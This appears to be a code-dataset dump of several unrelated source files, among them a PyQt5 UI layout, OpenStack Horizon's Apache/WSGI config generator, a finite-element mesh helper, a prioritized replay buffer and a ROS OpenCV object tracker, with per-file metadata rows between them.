self.opkey4Edit_2.setObjectName("opkey4Edit_2")
self.verticalLayout_2.addWidget(self.opkey4Edit_2)
self.opkey5Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey5Edit_2.setTabletTracking(True)
self.opkey5Edit_2.setText("")
self.opkey5Edit_2.setPlaceholderText("")
self.opkey5Edit_2.setObjectName("opkey5Edit_2")
self.verticalLayout_2.addWidget(self.opkey5Edit_2)
self.opkey6Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey6Edit_2.setTabletTracking(True)
self.opkey6Edit_2.setText("")
self.opkey6Edit_2.setPlaceholderText("")
self.opkey6Edit_2.setClearButtonEnabled(False)
self.opkey6Edit_2.setObjectName("opkey6Edit_2")
self.verticalLayout_2.addWidget(self.opkey6Edit_2)
self.splitter_2 = QtWidgets.QSplitter(self.issueDetailBox)
self.splitter_2.setGeometry(QtCore.QRect(10, 20, 153, 182))
self.splitter_2.setOrientation(QtCore.Qt.Vertical)
self.splitter_2.setObjectName("splitter_2")
self.opkeysBox = QtWidgets.QGroupBox(self.splitter_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.opkeysBox.sizePolicy().hasHeightForWidth())
self.opkeysBox.setSizePolicy(sizePolicy)
self.opkeysBox.setObjectName("opkeysBox")
self.verticalLayout = QtWidgets.QVBoxLayout(self.opkeysBox)
self.verticalLayout.setObjectName("verticalLayout")
self.opkey1Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey1Edit.setTabletTracking(True)
self.opkey1Edit.setText("")
self.opkey1Edit.setObjectName("opkey1Edit")
self.verticalLayout.addWidget(self.opkey1Edit)
self.opkey2Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey2Edit.setTabletTracking(True)
self.opkey2Edit.setText("")
self.opkey2Edit.setObjectName("opkey2Edit")
self.verticalLayout.addWidget(self.opkey2Edit)
self.opkey3Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey3Edit.setTabletTracking(True)
self.opkey3Edit.setText("")
self.opkey3Edit.setObjectName("opkey3Edit")
self.verticalLayout.addWidget(self.opkey3Edit)
self.opkey4Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey4Edit.setTabletTracking(True)
self.opkey4Edit.setText("")
self.opkey4Edit.setObjectName("opkey4Edit")
self.verticalLayout.addWidget(self.opkey4Edit)
self.opkey5Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey5Edit.setTabletTracking(True)
self.opkey5Edit.setText("")
self.opkey5Edit.setObjectName("opkey5Edit")
self.verticalLayout.addWidget(self.opkey5Edit)
self.opkey6Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey6Edit.setTabletTracking(True)
self.opkey6Edit.setText("")
self.opkey6Edit.setClearButtonEnabled(False)
self.opkey6Edit.setObjectName("opkey6Edit")
self.verticalLayout.addWidget(self.opkey6Edit)
self.splitter = QtWidgets.QSplitter(self.issueDetailBox)
self.splitter.setGeometry(QtCore.QRect(190, 20, 291, 361))
self.splitter.setOrientation(QtCore.Qt.Vertical)
self.splitter.setObjectName("splitter")
self.newParamsBox = QtWidgets.QGroupBox(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.newParamsBox.sizePolicy().hasHeightForWidth())
self.newParamsBox.setSizePolicy(sizePolicy)
self.newParamsBox.setObjectName("newParamsBox")
self.newParamsEdit = QtWidgets.QTextEdit(self.newParamsBox)
self.newParamsEdit.setGeometry(QtCore.QRect(10, 20, 271, 141))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.newParamsEdit.sizePolicy().hasHeightForWidth())
self.newParamsEdit.setSizePolicy(sizePolicy)
self.newParamsEdit.setPlaceholderText("")
self.newParamsEdit.setObjectName("newParamsEdit")
self.modifiedParamsBox = QtWidgets.QGroupBox(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.modifiedParamsBox.sizePolicy().hasHeightForWidth())
self.modifiedParamsBox.setSizePolicy(sizePolicy)
self.modifiedParamsBox.setObjectName("modifiedParamsBox")
self.modifiedParamsEdit = QtWidgets.QTextEdit(self.modifiedParamsBox)
self.modifiedParamsEdit.setGeometry(QtCore.QRect(10, 20, 271, 121))
self.modifiedParamsEdit.setObjectName("modifiedParamsEdit")
self.widget = QtWidgets.QWidget(self.centralwidget)
self.widget.setGeometry(QtCore.QRect(22, 20, 661, 81))
self.widget.setObjectName("widget")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.branchSelectBox = QtWidgets.QGroupBox(self.widget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.branchSelectBox.sizePolicy().hasHeightForWidth())
self.branchSelectBox.setSizePolicy(sizePolicy)
self.branchSelectBox.setObjectName("branchSelectBox")
self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.branchSelectBox)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.checkBox10x = QtWidgets.QCheckBox(self.branchSelectBox)
self.checkBox10x.setChecked(True)
self.checkBox10x.setObjectName("checkBox10x")
self.horizontalLayout_4.addWidget(self.checkBox10x)
self.checkBox9x = QtWidgets.QCheckBox(self.branchSelectBox)
self.checkBox9x.setChecked(True)
self.checkBox9x.setObjectName("checkBox9x")
self.horizontalLayout_4.addWidget(self.checkBox9x)
self.horizontalLayout.addWidget(self.branchSelectBox)
spacerItem1 = QtWidgets.QSpacerItem(250, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem1)
self.startButton = QtWidgets.QPushButton(self.widget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.startButton.sizePolicy().hasHeightForWidth())
self.startButton.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setFamily("Consolas")
font.setPointSize(14)
self.startButton.setFont(font)
self.startButton.setWhatsThis("")
self.startButton.setObjectName("startButton")
self.horizontalLayout.addWidget(self.startButton)
CCMTask.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(CCMTask)
self.statusbar.setObjectName("statusbar")
CCMTask.setStatusBar(self.statusbar)
self.retranslateUi(CCMTask)
QtCore.QMetaObject.connectSlotsByName(CCMTask)
def retranslateUi(self, CCMTask):
_translate = QtCore.QCoreApplication.translate
CCMTask.setWindowTitle(_translate("CCMTask", "CCMTask"))
self.issueBox.setTitle(_translate("CCMTask", "需求信息"))
self.ARDTSEdit.setPlaceholderText(_translate("CCMTask", "AR或者DTS编号"))
self.issueInfoEdit.setPlaceholderText(_translate("CCMTask", "需求描述信息"))
self.issueDetailBox.setTitle(_translate("CCMTask", "需求内容"))
self.deletedParamsBox.setTitle(_translate("CCMTask", "删除参数"))
self.opkeysBox_2.setTitle(_translate("CCMTask", "审核人列表"))
self.opkeysBox.setTitle(_translate("CCMTask", "运营商列表"))
self.opkey1Edit.setPlaceholderText(_translate("CCMTask", "OPkey1"))
self.opkey2Edit.setPlaceholderText(_translate("CCMTask", "OPkey2"))
self.opkey3Edit.setPlaceholderText(_translate("CCMTask", "OPkey3"))
self.opkey4Edit.setPlaceholderText(_translate("CCMTask", "OPkey4"))
self.opkey5Edit.setPlaceholderText(_translate("CCMTask", "OPkey5"))
self.opkey6Edit.setPlaceholderText(_translate("CCMTask", "OPkey6"))
self.newParamsBox.setTitle(_translate("CCMTask", "新增参数"))
self.modifiedParamsBox.setTitle(_translate("CCMTask", "修改参数"))
self.branchSelectBox.setTitle(_translate("CCMTask", "分支选择"))
self.checkBox10x.setText(_translate("CCMTask", "10.x ALL"))
self.checkBox9x.setText(_translate("CCMTask", "9.x ALL"))
self.startButton.setText(_translate("CCMTask", "Start"))
| 57
| 112
| 0.732539
| 14,954
| 0.984269
| 0
| 0
| 0
| 0
| 0
| 0
| 1,212
| 0.079774
|
a1fe7d59bcfb1477b00dec04a015c0d87e23fbf2
| 11,758
|
py
|
Python
|
openstack_dashboard/management/commands/make_web_conf.py
|
wilk/horizon
|
bdf7e692227367a928325acdd31088971d3c4ff4
|
[
"Apache-2.0"
] | 1
|
2019-08-07T08:46:03.000Z
|
2019-08-07T08:46:03.000Z
|
openstack_dashboard/management/commands/make_web_conf.py
|
wilk/horizon
|
bdf7e692227367a928325acdd31088971d3c4ff4
|
[
"Apache-2.0"
] | 5
|
2019-08-14T06:46:03.000Z
|
2021-12-13T20:01:25.000Z
|
openstack_dashboard/management/commands/make_web_conf.py
|
wilk/horizon
|
bdf7e692227367a928325acdd31088971d3c4ff4
|
[
"Apache-2.0"
] | 2
|
2020-03-15T01:24:15.000Z
|
2020-07-22T20:34:26.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import multiprocessing
import os
import re
import socket
import subprocess
import sys
import warnings
import six
from django.conf import settings
from django.core.management import base
from django import template
# Suppress DeprecationWarnings which clutter the output to the point of
# rendering it unreadable.
warnings.simplefilter('ignore')
cmd_name = __name__.split('.')[-1]
CURDIR = os.path.realpath(os.path.dirname(__file__))
PROJECT_PATH = os.path.realpath(os.path.join(CURDIR, '../..'))
STATIC_PATH = os.path.realpath(os.path.join(PROJECT_PATH, '../static'))
# Known apache regular expression to retrieve it's version
APACHE_VERSION_REG = r'Apache/(?P<version>[\d.]*)'
# Known apache commands to retrieve it's version
APACHE2_VERSION_CMDS = (
(('/usr/sbin/apache2ctl', '-V'), APACHE_VERSION_REG),
(('/usr/sbin/apache2', '-v'), APACHE_VERSION_REG),
)
# Known apache log directory locations
APACHE_LOG_DIRS = (
'/var/log/httpd', # RHEL / Red Hat / CentOS / Fedora Linux
'/var/log/apache2', # Debian / Ubuntu Linux
)
# Default log directory
DEFAULT_LOG_DIR = '/var/log'
def _getattr(obj, name, default):
"""Like getattr but return `default` if None or False.
By default, getattr(obj, name, default) returns default only if
attr does not exist, here, we return `default` even if attr evaluates to
None or False.
"""
value = getattr(obj, name, default)
if value:
return value
else:
return default
context = template.Context({
'DJANGO_SETTINGS_MODULE': os.environ['DJANGO_SETTINGS_MODULE'],
'HOSTNAME': socket.getfqdn(),
'PROJECT_PATH': os.path.realpath(
_getattr(settings, 'ROOT_PATH', PROJECT_PATH)),
'STATIC_PATH': os.path.realpath(
_getattr(settings, 'STATIC_ROOT', STATIC_PATH)),
'SSLCERT': '/etc/pki/tls/certs/ca.crt',
'SSLKEY': '/etc/pki/tls/private/ca.key',
'CACERT': None,
'PROCESSES': multiprocessing.cpu_count() + 1,
})
context['PROJECT_ROOT'] = os.path.dirname(context['PROJECT_PATH'])
context['PROJECT_DIR_NAME'] = os.path.basename(
context['PROJECT_PATH'].split(context['PROJECT_ROOT'])[1])
context['PROJECT_NAME'] = context['PROJECT_DIR_NAME']
context['DEFAULT_WSGI_FILE'] = os.path.join(
context['PROJECT_PATH'], 'wsgi.py')
context['WSGI_FILE'] = os.path.join(
context['PROJECT_PATH'], 'horizon_wsgi.py')
VHOSTNAME = context['HOSTNAME'].split('.')
VHOSTNAME[0] = context['PROJECT_NAME']
context['VHOSTNAME'] = '.'.join(VHOSTNAME)
if len(VHOSTNAME) > 1:
context['DOMAINNAME'] = '.'.join(VHOSTNAME[1:])
else:
context['DOMAINNAME'] = 'openstack.org'
context['ADMIN'] = 'webmaster@%s' % context['DOMAINNAME']
context['ACTIVATE_THIS'] = None
virtualenv = os.environ.get('VIRTUAL_ENV')
if virtualenv:
activate_this = os.path.join(
virtualenv, 'bin/activate_this.py')
if os.path.exists(activate_this):
context['ACTIVATE_THIS'] = activate_this
# Try to detect apache's version
# We fallback on 2.4.
context['APACHE2_VERSION'] = 2.4
APACHE2_VERSION = None
for cmd in APACHE2_VERSION_CMDS:
if os.path.exists(cmd[0][0]):
try:
reg = re.compile(cmd[1])
output = subprocess.check_output(cmd[0], stderr=subprocess.STDOUT)
if isinstance(output, six.binary_type):
output = output.decode()
res = reg.search(output)
if res:
APACHE2_VERSION = res.group('version')
break
except subprocess.CalledProcessError:
pass
if APACHE2_VERSION:
ver_nums = APACHE2_VERSION.split('.')
if len(ver_nums) >= 2:
try:
context['APACHE2_VERSION'] = float('.'.join(ver_nums[:2]))
except ValueError:
pass
def find_apache_log_dir():
for log_dir in APACHE_LOG_DIRS:
if os.path.exists(log_dir) and os.path.isdir(log_dir):
return log_dir
return DEFAULT_LOG_DIR
context['LOGDIR'] = find_apache_log_dir()
class Command(base.BaseCommand):
args = ''
help = """Create %(wsgi_file)s
or the contents of an apache %(p_name)s.conf file (on stdout).
The apache configuration is generated on stdout because the place of this
file is distribution dependent.
examples::
manage.py %(cmd_name)s --wsgi # creates %(wsgi_file)s
manage.py %(cmd_name)s --apache # creates an apache vhost conf file (on \
stdout).
manage.py %(cmd_name)s --apache --ssl --mail=%(admin)s \
--project=%(p_name)s --hostname=%(hostname)s
To create an acpache configuration file, redirect the output towards the
location you desire, e.g.::
manage.py %(cmd_name)s --apache > \
/etc/httpd/conf.d/openstack_dashboard.conf
""" % {
'cmd_name': cmd_name,
'p_name': context['PROJECT_NAME'],
'wsgi_file': context['WSGI_FILE'],
'admin': context['ADMIN'],
'hostname': context['VHOSTNAME'], }
def add_arguments(self, parser):
# TODO(ygbo): Add an --nginx option.
parser.add_argument(
"-a", "--apache",
default=False, action="store_true", dest="apache",
help="generate an apache vhost configuration"
)
parser.add_argument(
"--cacert",
dest="cacert",
help=("Use with the --apache and --ssl option to define the path"
" to the SSLCACertificateFile"),
metavar="CACERT"
)
parser.add_argument(
"-f", "--force",
default=False, action="store_true", dest="force",
help="force overwriting of an existing %s file" %
context['WSGI_FILE']
)
parser.add_argument(
"-H", "--hostname",
dest="hostname",
help=("Use with the --apache option to define the server's"
" hostname (default : %s)") % context['VHOSTNAME'],
metavar="HOSTNAME"
)
parser.add_argument(
"--logdir",
dest="logdir",
help=("Use with the --apache option to define the path to "
"the apache log directory(default : %s)"
% context['LOGDIR']),
metavar="CACERT"
)
parser.add_argument(
"-m", "--mail",
dest="mail",
help=("Use with the --apache option to define the web site"
" administrator's email (default : %s)") %
context['ADMIN'],
metavar="MAIL"
)
parser.add_argument(
"-n", "--namedhost",
default=False, action="store_true", dest="namedhost",
help=("Use with the --apache option. The apache vhost "
"configuration will work only when accessed with "
"the proper hostname (see --hostname).")
)
parser.add_argument(
"--processes",
dest="processes",
help=("Use with the --apache option to define the number of "
"apache processes (by default the number of cpus +1 which "
"is %s on this machine).") % context['PROCESSES'],
metavar="PROCESSES"
)
parser.add_argument(
"-p", "--project",
dest="project",
help=("Use with the --apache option to define the project "
"name (default : %s)") % context['PROJECT_NAME'],
metavar="PROJECT"
)
parser.add_argument(
"-s", "--ssl",
default=False, action="store_true", dest="ssl",
help=("Use with the --apache option. The apache vhost "
"configuration will use an SSL configuration")
)
parser.add_argument(
"--sslcert",
dest="sslcert",
help=("Use with the --apache and --ssl option to define "
"the path to the SSLCertificateFile (default : %s)"
) % context['SSLCERT'],
metavar="SSLCERT"
)
parser.add_argument(
"--sslkey",
dest="sslkey",
help=("Use with the --apache and --ssl option to define "
"the path to the SSLCertificateKeyFile "
"(default : %s)") % context['SSLKEY'],
metavar="SSLKEY"
)
parser.add_argument(
"--apache-version",
dest="apache_version",
type=float,
help=("Use with the --apache option to define the apache "
"major (as a floating point number) version "
"(default : %s)."
% context['APACHE2_VERSION']),
metavar="APACHE_VERSION"
)
parser.add_argument(
"-w", "--wsgi",
default=False, action="store_true", dest="wsgi",
help="generate the horizon.wsgi file"
)
def handle(self, *args, **options):
force = options.get('force')
context['SSL'] = options.get('ssl')
if options.get('mail'):
context['ADMIN'] = options['mail']
if options.get('cacert'):
context['CACERT'] = options['cacert']
if options.get('logdir'):
context['LOGDIR'] = options['logdir'].rstrip('/')
if options.get('processes'):
context['PROCESSES'] = options['processes']
if options.get('project'):
context['PROJECT_NAME'] = options['project']
if options.get('hostname'):
context['VHOSTNAME'] = options['hostname']
if options.get('sslcert'):
context['SSLCERT'] = options['sslcert']
if options.get('sslkey'):
context['SSLKEY'] = options['sslkey']
if options.get('apache_version'):
context['APACHE2_VERSION'] = options['apache_version']
if options.get('namedhost'):
context['NAMEDHOST'] = context['VHOSTNAME']
else:
context['NAMEDHOST'] = '*'
# Generate the WSGI.
if options.get('wsgi'):
with open(
os.path.join(CURDIR, 'horizon.wsgi.template'), 'r'
) as fp:
wsgi_template = template.Template(fp.read())
if not os.path.exists(context['WSGI_FILE']) or force:
with open(context['WSGI_FILE'], 'w') as fp:
fp.write(wsgi_template.render(context))
print('Generated "%s"' % context['WSGI_FILE'])
else:
sys.exit('"%s" already exists, use --force to overwrite' %
context['WSGI_FILE'])
# Generate the apache configuration.
elif options.get('apache'):
# first check if custom wsgi file exists, if not, use default:
if not os.path.exists(context['WSGI_FILE']):
context['WSGI_FILE'] = context['DEFAULT_WSGI_FILE']
with open(
os.path.join(CURDIR, 'apache_vhost.conf.template'), 'r'
) as fp:
wsgi_template = template.Template(fp.read())
sys.stdout.write(wsgi_template.render(context))
else:
self.print_help('manage.py', cmd_name)
| 35.203593
| 78
| 0.58743
| 7,199
| 0.612264
| 0
| 0
| 0
| 0
| 0
| 0
| 5,162
| 0.43902
|
a1fe9f599cc2d428cbcc60b9598dd9359a4d7d5f
| 1,107
|
py
|
Python
|
codes/convergence_elasticity_advection/meshManager.py
|
adRenaud/research
|
2f0062a1800d7a17577bbfc2393b084253d567f4
|
[
"MIT"
] | 1
|
2021-06-18T14:52:03.000Z
|
2021-06-18T14:52:03.000Z
|
codes/convergence_elasticity/meshManager.py
|
adRenaud/research
|
2f0062a1800d7a17577bbfc2393b084253d567f4
|
[
"MIT"
] | 1
|
2019-01-07T13:11:11.000Z
|
2019-01-07T13:11:11.000Z
|
codes/convergence_elasticity_advection/meshManager.py
|
adRenaud/research
|
2f0062a1800d7a17577bbfc2393b084253d567f4
|
[
"MIT"
] | null | null | null |
# !/usr/bin/python
import numpy as np
import math as m
def buildMesh(Mp,l,ppc):
# Mesh built by giving :
# 1-Number of elements in x-direction
# 2-Length of meshed domain
# 3-Number of particle per cell
nex = Mp/ppc
nnx=nex+1
lmp=l/(Mp-1)
dx = ppc*l/nex
xn = np.linspace(-lmp/2,l+lmp/2,nex+1)
connect = np.array([np.arange(0,nnx-1,1),np.arange(1,nnx,1)]).T
return xn,connect
def bar(x1,x2,Mp):
xp=np.zeros((Mp,2))
xp[:,0]=np.linspace(x1,x2,Mp)
return xp
def circle(c,r,nr,nt):
pi=m.pi
xp=np.zeros(((nr-1)*nt + 1,2))
xp[0,:]=np.array([0,0])
dr=r/(nr-1)
dt=2.*pi/nt
count=1
for t in range(nt):
for r in range(nr-1):
xp[count,:]=np.array([(r+1)*dr*m.cos(t*dt),(r+1)*dr*m.sin(t*dt)])
count+=1
xp[:]+=c
return xp
def rectangle(x0,Nx,Ny,lx,ly):
xp=np.zeros((Nx*Ny,2))
dx=lx/(Nx-1)
if Ny!=1:
dy=ly/(Ny-1)
else :
dy=0
for iy in range(Ny):
for ix in range(Nx):
xp[iy*Nx + ix,0]=x0[0]+ix*dx
xp[iy*Nx + ix,1]=x0[1]+iy*dy
return xp
| 22.14
| 76
| 0.532972
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 137
| 0.123758
|
a1fedb42ea7da198208259c1cf29d8481af7dd8f
| 3,202
|
py
|
Python
|
exarl/agents/agent_vault/_prioritized_replay.py
|
schr476/EXARL
|
7f4596bd8b3d7960aaf52bc677ceac4f37029834
|
[
"BSD-3-Clause"
] | 2
|
2022-02-03T20:33:17.000Z
|
2022-02-10T22:43:32.000Z
|
exarl/agents/agent_vault/_prioritized_replay.py
|
schr476/EXARL
|
7f4596bd8b3d7960aaf52bc677ceac4f37029834
|
[
"BSD-3-Clause"
] | 40
|
2022-01-25T18:03:12.000Z
|
2022-03-31T21:43:32.000Z
|
exarl/agents/agent_vault/_prioritized_replay.py
|
schr476/EXARL
|
7f4596bd8b3d7960aaf52bc677ceac4f37029834
|
[
"BSD-3-Clause"
] | 1
|
2022-02-10T14:33:30.000Z
|
2022-02-10T14:33:30.000Z
|
import random
import numpy as np
import tensorflow as tf
from collections import deque
class PrioritizedReplayBuffer():
""" Class implements Prioritized Experience Replay (PER)
"""
def __init__(self, maxlen):
""" PER constructor
Args:
maxlen (int): buffer length
"""
self.maxlen = None if maxlen == "none" else maxlen
self.buffer = deque(maxlen=self.maxlen)
self.priorities = deque(maxlen=self.maxlen)
def add(self, experience):
""" Add experiences to buffer
Args:
experience (list): state, action, reward, next_state, done
Returns:
full_buffer (done): True if buffer is full
"""
full_buffer = len(self.buffer) == self.maxlen
self.buffer.append(experience)
self.priorities.append(max(self.priorities, default=1))
return full_buffer
def get_probabilities(self, priority_scale):
""" Get probabilities for experiences
Args:
priority_scale (float64): range [0, 1]
Returns:
sample_probabilities (numpy array): probabilities assigned to experiences based on weighting factor (scale)
"""
scaled_priorities = np.array(self.priorities) ** priority_scale
sample_probabilities = scaled_priorities / sum(scaled_priorities)
return sample_probabilities
def get_importance(self, probabilities):
""" Compute importance
Args:
probabilities (numpy array): experience probabilities
Returns:
importance_normalized (numpy array): normalized importance
"""
importance = 1 / len(self.buffer) * 1 / probabilities
importance_normalized = importance / max(importance)
return importance_normalized
def sample(self, batch_size, priority_scale=1.0):
""" Sample experiences
Args:
batch_size (int): size of batch
priority_scale (float, optional): range = [0, 1]. Defaults to 1.0.
Returns:
samples (list): sampled based on probabilities
importance (numpy array): Importance of samples
sample_indices (array): Indices of samples
"""
sample_size = min(len(self.buffer), batch_size)
sample_probs = self.get_probabilities(priority_scale)
sample_indices = random.choices(range(len(self.buffer)), k=sample_size, weights=sample_probs)
samples = np.array(self.buffer, dtype=object)[sample_indices]
importance = self.get_importance(sample_probs[sample_indices])
return samples, importance, sample_indices
def set_priorities(self, indices, errors, offset=0.1):
""" Set priorities to experiences
Args:
indices (array): sample indices
errors (array): corresponding losses
offset (float, optional): Small offset. Defaults to 0.1.
"""
for i, e in zip(indices, errors):
self.priorities[int(i)] = abs(e) + offset
def get_buffer_length(self):
""" Get buffer length
Returns:
(int): buffer length
"""
return len(self.buffer)
| 32.673469
| 119
| 0.628045
| 3,112
| 0.971893
| 0
| 0
| 0
| 0
| 0
| 0
| 1,483
| 0.463148
|
b8009f8fd07294eb10166608312734f91397abd7
| 5,722
|
py
|
Python
|
rmtt_tracker/scripts/roi_tracker.py
|
cavayangtao/rmtt_ros
|
e89383510373e9ff9c8bb5c43ae719ca575ef2f5
|
[
"BSD-3-Clause"
] | null | null | null |
rmtt_tracker/scripts/roi_tracker.py
|
cavayangtao/rmtt_ros
|
e89383510373e9ff9c8bb5c43ae719ca575ef2f5
|
[
"BSD-3-Clause"
] | null | null | null |
rmtt_tracker/scripts/roi_tracker.py
|
cavayangtao/rmtt_ros
|
e89383510373e9ff9c8bb5c43ae719ca575ef2f5
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python3
# coding=utf-8
# 环境准备:pip install opencv_contrib_python
# 输入话题:tianbot_mini/image_raw/compressed
# 输出话题:roi
import sys
import os
import rospy
import sensor_msgs.msg
from cv_bridge import CvBridge
import cv2
import numpy as np
from sensor_msgs.msg import RegionOfInterest as ROI
from sensor_msgs.msg import CompressedImage
br = CvBridge()
class MessageItem(object):
# 用于封装信息的类,包含图片和其他信息
def __init__(self,frame,message):
self._frame = frame
self._message = message
def getFrame(self):
# 图片信息
return self._frame
def getMessage(self):
#文字信息,json格式
return self._message
class Tracker(object):
'''
追踪者模块,用于追踪指定目标
'''
def __init__(self, tracker_type="TLD", draw_coord=True):
'''
初始化追踪器种类
'''
# 获得opencv版本
(major_ver, minor_ver, subminor_ver) = (cv2.__version__).split('.')
self.tracker_types = ['BOOSTING', 'MIL', 'KCF', 'TLD', 'MEDIANFLOW', 'GOTURN', "CSRT"]
self.tracker_type = tracker_type
self.isWorking = False
self.draw_coord = draw_coord
# 构造追踪器
if int(major_ver) < 3:
self.tracker = cv2.Tracker_create(tracker_type)
else:
if tracker_type == 'BOOSTING':
self.tracker = cv2.TrackerBoosting_create()
if tracker_type == 'MIL':
self.tracker = cv2.TrackerMIL_create()
if tracker_type == 'KCF':
self.tracker = cv2.TrackerKCF_create()
if tracker_type == 'TLD':
self.tracker = cv2.TrackerTLD_create()
if tracker_type == 'MEDIANFLOW':
self.tracker = cv2.TrackerMedianFlow_create()
if tracker_type == 'GOTURN':
self.tracker = cv2.TrackerGOTURN_create()
if tracker_type == "CSRT":
self.tracker = cv2.TrackerCSRT_create()
def initWorking(self, frame, box):
'''
追踪器工作初始化
frame:初始化追踪画面
box:追踪的区域
'''
if not self.tracker:
raise Exception("追踪器未初始化")
status = self.tracker.init(frame, box)
if not status:
raise Exception("追踪器工作初始化失败")
self.coord = box
self.isWorking = True
def track(self, frame):
'''
开启追踪
'''
message = None
if self.isWorking:
status, self.coord = self.tracker.update(frame)
if status:
message = {"coord": [((int(self.coord[0]), int(self.coord[1])),
(int(self.coord[0] + self.coord[2]), int(self.coord[1] + self.coord[3])))]}
if self.draw_coord:
p1 = (int(self.coord[0]), int(self.coord[1]))
p2 = (int(self.coord[0] + self.coord[2]), int(self.coord[1] + self.coord[3]))
cv2.rectangle(frame, p1, p2, (255, 0, 0), 2, 1)
message['msg'] = self.tracker_type + " is tracking"
# 更新ROI
if (int(self.coord[0]) <0 or int(self.coord[1]) <0):
tld_roi.x_offset = 0
tld_roi.y_offset = 0
tld_roi.width = 0
tld_roi.height = 0
else:
tld_roi.x_offset = int(self.coord[0])
tld_roi.y_offset = int(self.coord[1])
tld_roi.width = int(self.coord[2])
tld_roi.height = int(self.coord[3])
# 发布ROI
pub.publish(tld_roi)
return MessageItem(frame, message)
def compressed_detect_and_draw(compressed_imgmsg):
global br,gFrame,gCapStatus,getFrame,loopGetFrame
if ((getFrame == True) or (loopGetFrame == True)):
gFrame = br.compressed_imgmsg_to_cv2(compressed_imgmsg, "bgr8")
gCapStatus = True
getFrame = True
gFrame = np.zeros((640,640,3), np.uint8)
gCapStatus = False
getFrame = True
loopGetFrame = False
if __name__ == '__main__':
rospy.init_node('tbm_tld_tracker_node')
rospy.Subscriber("/image_raw", sensor_msgs.msg.CompressedImage, compressed_detect_and_draw)
pub = rospy.Publisher("roi",ROI,queue_size=10)
tld_roi = ROI()
# rate = rospy.Rate(10)
# rate.sleep()
# 选择 框选帧
print("按 n 渲染下一帧,按 y 设定当前帧作为ROI区域选择帧")
while True:
_key = cv2.waitKey(0) & 0xFF
if(_key == ord('n')):
# gCapStatus,gFrame = gVideoDevice.read()
getFrame = True
if(_key == ord('y')):
break
cv2.imshow("Pick frame",gFrame)
# 框选感兴趣区域region of interest
cv2.destroyWindow("Pick frame")
gROI = cv2.selectROI("ROI frame",gFrame,False)
if (not gROI):
print("空框选,退出")
quit()
# 初始化追踪器
gTracker = Tracker(tracker_type="TLD")
gTracker.initWorking(gFrame,gROI)
# 循环帧读取,开始跟踪
while not rospy.is_shutdown():
# gCapStatus, gFrame = gVideoDevice.read()
loopGetFrame = True
if(gCapStatus):
# 展示跟踪图片
_item = gTracker.track(gFrame)
cv2.imshow("Track result",_item.getFrame())
if _item.getMessage():
# 打印跟踪数据
print(_item.getMessage())
_key = cv2.waitKey(1) & 0xFF
if (_key == ord('q')) | (_key == 27):
break
if (_key == ord('r')) :
# 用户请求用初始ROI
print("用户请求用初始ROI")
gTracker = Tracker(tracker_type="TLD")
gTracker.initWorking(gFrame, gROI)
else:
print("捕获帧失败")
quit()
| 31.097826
| 113
| 0.54072
| 3,535
| 0.577049
| 0
| 0
| 0
| 0
| 0
| 0
| 1,303
| 0.2127
|
b80101fcb0f7ec764004534f9989b58dc2d327bf
| 4,236
|
py
|
Python
|
api-scanner/method_analysis_job.py
|
ybqdren/Python-JavaAPI-Scanner
|
69e2de07c95a8edf526dfb4b8eb14deec5693061
|
[
"Apache-2.0"
] | null | null | null |
api-scanner/method_analysis_job.py
|
ybqdren/Python-JavaAPI-Scanner
|
69e2de07c95a8edf526dfb4b8eb14deec5693061
|
[
"Apache-2.0"
] | null | null | null |
api-scanner/method_analysis_job.py
|
ybqdren/Python-JavaAPI-Scanner
|
69e2de07c95a8edf526dfb4b8eb14deec5693061
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
